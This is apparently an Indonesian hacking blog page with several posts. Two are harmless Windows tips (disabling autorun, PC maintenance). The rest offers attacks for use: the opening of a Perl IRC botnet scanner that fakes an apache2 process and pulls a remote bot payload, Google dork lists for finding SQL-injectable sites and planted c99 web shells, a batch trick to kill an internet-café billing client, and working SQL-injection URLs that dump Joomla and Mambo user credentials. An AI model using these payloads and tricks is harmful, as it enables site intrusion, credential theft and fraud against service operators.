Disable Autorun/Disable Autoplay

Ini adalah trik registry mencegah Virus Langsung masuk ke dalam Hardisk melalui Flashdisk maupun melalui CD/Dvd, sebenarnya virus masuk tidak lewat dari autorun / autoplay saja..hanya sekedar mengantisipasi, walaupun banyak Anti virus yang langsung scan pas AutoRun.
Berikut beberap cara yang bisa di Coba untuk meminimalisir virus masuk ke dalam Hardisk Komputer yang pasti di OS Windows.
Caranya adalah sebagai berikut :


Cara I Mendisable Autorun / Autoplay melalui Group Policy [GPEDIT.MSC]
1. Kilk "Start" pada Start Menu
2. Klik "Run"
3. Ketik "gpedit.msc", lalu OK/ tekan Enter
4. Pada bagian "User Configuration", Double Click (jendela sebelah kiri)
5. Double klik pada "Administrative Template" (jendela sebelah kanan)
6. Kemudian double klik "System"
7. Double klik lagi pada "Turn Off Autoplay"




8. Pada bagian Setting pilih "Enable", Kemudian pada "Turn Off Autoplay on: " pilih "All Drives"



9. Klik Apply, lalu OK,
10. Kemudian Restart Komputer.




Cara II Mendisable Autorun/Autoplay melalui registry
1) Klik pada "Start menu"
2) Klik "Run"
3) Ketik "regedit"
4) Browse ke alamat registry berikut :

HKEY_CURRENT_USER --> Software --> Microsoft --> Windows --> CurrentVersion --> Policies --> Explorer

HKEY_USERS --> .DEFAULT --> Software --> Microsoft --> Windows --> CurrentVersion --> Policies --> Explorer

5) Kemudian klik kanan pada string "NoDriveTypeAutoRun"



6) Pada Alamat registry tersebut, isi value harus diubah agar autorun tidak aktif
7) Isi value data dengan "ff" (tanpa tanda kutip) yang berarti fungsi Aturun/Autoply akan di matikan pada 255 drive





8) Kemudian Klik Tombol [OK]
9) Keluar dari “Registry Editor”
10) Restart komputer agar perubahan ini berjalan

Read More

e107 New Scanner with Perl

#!/usr/bin/perl
$powered="ByroeNet";
$mail="admin(at)byroe.net";
#######################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k start";
$ircserver = "irc.kill-9.server.or.id";
my $ircport = "6667";
my $nickname = "loveYou";
my $ident = "love";
my $channel = "#kill-9";
my $runner = "arianom";
my $fullname = 'matamu suwek';
my $lfi = "!lfi";
my $xml = "!xml";
my $e107 = "!e107";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmde107 = "!cmde107";
my $cmdxml = "!cmdxml";
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ";
my $rfiid = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/id.txt?";
my $byroesprd = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/pbot.txt?";

Read More

11 Tips Merawat Komputer

1. Defrag harddisk secara berkala. Fungsi defrag adalah untuk menata dan mengurutkan file-file harddisk berdasarkan jenis file/data sedemikian rupa sehingga akan mempermudah proses read/write sehingga beban kerja akan lebih ringan yg akhirnya dapat memperpanjang umur harddisk. Caranya klik menu Start > Program > Accesories > System Tool > Disk DefragmenterSaat menjalankan fungsi ini tidak boleh ada program lain yg berjalan termasuk screensaver karena akan mengacaukan fungsi defrag ini.

2. Aktifkan screensaver Selain bersifat estetis, screensaver mempunyai fungsi lain yg penting. Monitor CRT juga televisi menggunakan fosfor untuk menampilkan gambar. Kalau monitor menampilkan gambar yg sama untuk beberapa saat maka ada fosfor yang menyala terus menerus. Hal ini dapat mengakibatkan monitor bermasalah yaitu gambar menjadi redup/kurang jelas. Lain halnya jika monitor Anda adalah LCD, LED yg sudah dilengkapi dengan energy saving, maka screensaver tidak terlalu dibutuhkan lagi.Cara+ mengaktifkan screensaver dapat dilakukan dengan banyak cara, salah satunya klik Start > Control Panel > Display > klik tab screensaver, kemudian pilih sesuai selera Anda.

3. Ventilasi yang cukup Tempatkan monitor maupun CPU sedemikian rupa sehingga ventilasi udara dari dan ke monitor / CPU cukup lancar. Ventilasi yg kurang baik akan menyebabkan panas berlebihan sehingga komponen/rangkaian elektronik di dalamnya akan menjadi cepat panas sehingga dapat memperpendek umur komponen tsb. Oleh karena itu usahakan jarak antara monitor/CPU dengan dinding/tembok minimal 30 cm. Kalau perlu pasang kipas angin di dalam ruangan.

4. Pakailah UPS atau stavolt.Pakailah UPS untuk mengantisipasi listrik mati secara tiba-tiba yg dapat mengakibatkan kerusakan pada harddisk. Kalau terpaksa tidak ada UPS, pakailah Stavolt untuk mengantisipasi naik turunnya tegangan listrik.

5. Tutup / close program yg tidak berguna Setiap program yg diload atau dijalankan membutuhkan memory (RAM) sehingga semakin banyak program yg dijalankan semakin banyak memory yg tersita. Hal ini selain dapat menyebabkan komputer berjalan lambat (lelet) juga beban kerja menjadi lebih berat yg akhirnya dapat memperpendek umur komponen/komputer.

6. Install program antivirus dan update secara berkala Untuk dapat mengenali virus/trojan2 baru sebaiknya update program antivirus secara berkala. Virus yg terlanjur menyebar di komputer dapat membuat Anda menginstall ulang komputer. Hal ini selain membutuhkan biaya juga akan menyebabkan harddisk Anda akan lebih cepat rusak dibanding apabila tidak sering diinstall ulang.

7. Bersihkan Recycle Bin secara rutinSebenarnya file/folder yg kita hapus tidak langsung hilang dari harddisk karena akan ditampung dahulu di Recycle Bin ini dengan maksud agar suatu saat apabila Anda masih membutuhkannya dapat mengembalikan lagi. Recycle Bin yg sudah banyak juga akan menyita ruang harddisk yg dapat menyebabkan pembacaan harddisk jadi lelet.Caranya jalankan Windows Explorer > klik Recycle Bin > klik File > klik Empty Recyle BinAtau Anda dapat menjalankan fungsi Disk Cleanup Caranya Klik Start >Program > Accessories > System Tool > Disk Cleanup > kemudian pilih drive yg mau dibersihkan > setelah itu centangilah opsi Recycle Bin kalau perlu centangi juga yg lain (seperti temporary file, temporary internet file), setelah klik OK.

8. Jangan meletakkan Speacker Active terlalu dekat dengan monitorKarena medan magnet yang ada pada speacker tersebut akan mempengaruhi monitor yaitu warna monitor menjadi tidak rata atau belang-belang.

9. Uninstall atau buang program yg tidak bergunaRuang harddisk yg terlalu banyak tersita akan memperlambat proses read/write harddisk sehingga beban kerjanya akan lebih berat sehingga harddisk akan cepat rusak.

10. Bersihkan motherboard & periferal lain dari debu secara berkala Setidaknya enam bulan sekali hal ini harus dilakukan. Buka casingnya terlebih dahulu kemudian bersihkanmotherboard dan periferal lain (RAM, Video Card, Modem, Sound Card, CDR/CDRW/DVRW, TV Tuner) dengan sikat halus. Pada saat komputer tidak digunakan tutuplah komputer (monitor, CPU, keyboard/mouse) dengan cover sehingga debu tidak mudah masuk ke dalam komputer.

11. Pasang kabel ground. Apabila casing nyetrum, ambil kabel dengan panjang seperlunya, ujung satu dihubungkan dengan badan CPU (pada casing) sedangkan ujung yg lain ditanam dalam tanah. Hal ini akan dapat menetralkan arus listrik yg “nyasar” sehingga dapat membuat komponen elektronik lebih awet.

Read More

Dork Sql Injection

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=




lu semua tinggal masukin syntax ini di google then u find 4 u're self how to deface or hack the website bro..hehe..jerih payah nih bro..cape bikinnya segini byk..lu mah enak tgl nikmatin doank.hahaha..

Read More

cara jebol billing explorer

caranya gampang.............

1.buka notepad

2.d situ silahkan ketik

@echo off
taskkill/f /im /client008.exe

kalau ternyata bukan client008 silahkan ganti aja...........
3.simpan dengan 008.bat

4.setelah itu buka explore

ingat-ingat d mana tadi nyimpen filenya

setelah itu klik kanan send to desktop(create shortcut)

5.buka desktop

klik kanan pada 008.bat

klik properties

silahkan atur shortcutkeynya

misalnya ctrl+alt+z

6.log out dari billing ....
silahkan bayar dulu.........

7.kembali ke kompi....

dan silahkan tekan ctrl+alt+z

8.jreng....................

9.merdeka..................

silahkan browsing sepuasnya............




maap klw kurang jelas aqw masih pemula

Read More

dork buat nyari shell c99

safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
download c99.php
download c99.php
download c99.php
inurl:c99.php
inurl:c99.php
allinurl: c99.php
inurl:c99.php
allinurl: c99.php
inurl:"/c99.php"
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php
inurl:"c99.php"
allinurl:c99.php
inurl:"/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:"c99.php"
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
allinurl:c99.php?
allinurl:c99.php?
allinurl:c99.php?
"inurl:c99..php"
allinurl:c99.php
c99shell [file on secure ok ]?
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
c99.php download
inurl:c99.php
inurl:"c99.php"
inurl:/c99.php
inurl:"c99.php?"
inurl:c99.php
inurl:c99.php
files/c99.php
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php
inurl:c99.php
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5

inurl:c99.php
inurl:c99.php
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
c99shell v. 1.0 pre-release build #16
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove

Logout
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
inurl:c99.php
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
inurl:c99.php
inurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
inurl:"c99.php"
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
allinurl:c99.php
intitle:C99Shell pre-release
inurl:"c99.php"
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release build #16!
allinurl:c99.php
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
allinurl:c99.php
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
allinurl:/c99.php
powered by Captain Crunch Security Team
inurl:c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release
inurl:c99.php
inurl:c99.php ext:php
inurl:"c99.php"
allinurl:"c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
C99Shell v. 1.0 pre-release build #16 software apache
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
inurl:"c99.php"
allintitle: C99shell filetype:php
C99Shell v. 1.0 pre-release build #16!
"c99shell v. 1.0 pre-release"
c99shell v. 1.0 pre-release build #5
allinurl:"c99.php" filetype:php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
inurl:c99.php
c99shell v. 1.0
allinurl: c99.php
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
inurl:"/c99.php"
c99shell +uname
c99shell php + uname
c99shell php + uname
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
allinurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
intitle:c99shell filetype:php
"Encoder Tools Proc. FTP brute"
"c99" filetype:php intext:"Safe-Mode: OFF"
c99shell v. 1.0 pre
inurl:c99.php
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
c99.php "intitle:Index of "
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php

Read More

Joomla bugs

Dork:
allinurlption=com_livechat

Exploit :
administrator/components/com_livechat/getChat.php?chat=0&last=1=+union+select+
1,unhex(hex(concat(username,0×3a,password))),3,4+ from+jos_users

administrator/components/com_livechat/getSavedChatRooms.php?chat=
0&last=1+union+select+1,unhex(hex(concat(usernam e, 0×3a,password))),3+from+jos_users

Joomla “option=com_juser”
info http://milw0rm.com/exploits/8847

Dork:
inurlption=com_juser

exploit:
index.php?option=com_juser&task=show_profile&id=70 +and+1=2+union+select+1,2,concat
(username,0×3a,password)chipdebi0s,4,5,6,7,8,9,10 ,11,12,13+from+jos_users–

Joomla “com_jvideo”
info dari http://milw0rm.com/exploits/8821

Dork :
inurlption=com_jvideo
inurl:com_jvideo

exploit:
index.php?option=com_jvideo&view=user&user_id=62+a nd%201=2+union+select+concat
(username,0×3a,password)+from+jos_users

Joomla “option=com_juser”
info http://milw0rm.com/exploits/8847

Dork:
inurlption=com_juser

exploit:
Code:
index.php?option=com_juser&task=show_profile&id=70 +and+1=2+union+select+1,2,concat
(username,0×3a,password)chipdebi0s,4,5,6,7,8,9,10 ,11,12,13+from+jos_users–

Joomla com_ewriting

Dorks:
allinurl:”com_ewriting”

Exploit :
Joomla!
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0×3a,password),4,5,6,7,8,9,10 +FROM+jos_users–

Mambo
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0×3a,password),4,5,6,7,8,9,10 +FROM+mos_users–

Joomla com_simple_review Sql injection

Dork:
inurl:”com_simple_review”

Exploit:
index.php?option=com_simple_review&category=4+AND+ 1=2+UNION+SELECT+0,concat_ws
(username,0×3a,password),2+from+jos_users–

Joomla Qur’an component

DORK :
inurl:”/index.php?option=com_quran”
allinurl:”com_quran”

Exploit :

Mambo
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0×3a,password ),3,4,5+from+mos_users+limit+0,20–

Joomla
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0×3a,password ),3,4,5+from+jos_users+limit+0,20–

Joomla Component com_cinema SQL Injection

DORK
allinurl: “com_cinema”

EXPLOiT 1 :
index.php?option=com_cinema&Itemid=S@BUN&func=deta il&id=-99999/**/union/**/select/
**/0,1,0×3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8 ,19,20,21,22,23,24,25,26,27,28,29,30,
31,32,concat(username,0×3a,password)/**/from/**/jos_users/*

EXPLOiT 2 :
[/i]index.php?option=com_cinema&Itemid=S@BUN&func=deta il&id=-99999/**/union/**/select/
**/0,1,0×3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8 ,19,20,21,22,23,24,25,26,27,29,29,30,
concat(username,0×3a,password)/**/from/**/jos_users/*

Joomla Component joomradio Remote SQL Injection

DORK:
inurl:com_joomradio

Exploit :
Code:
index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0×3a,password),user(),user (),user(),user(),user() FROM jos_users–

Read More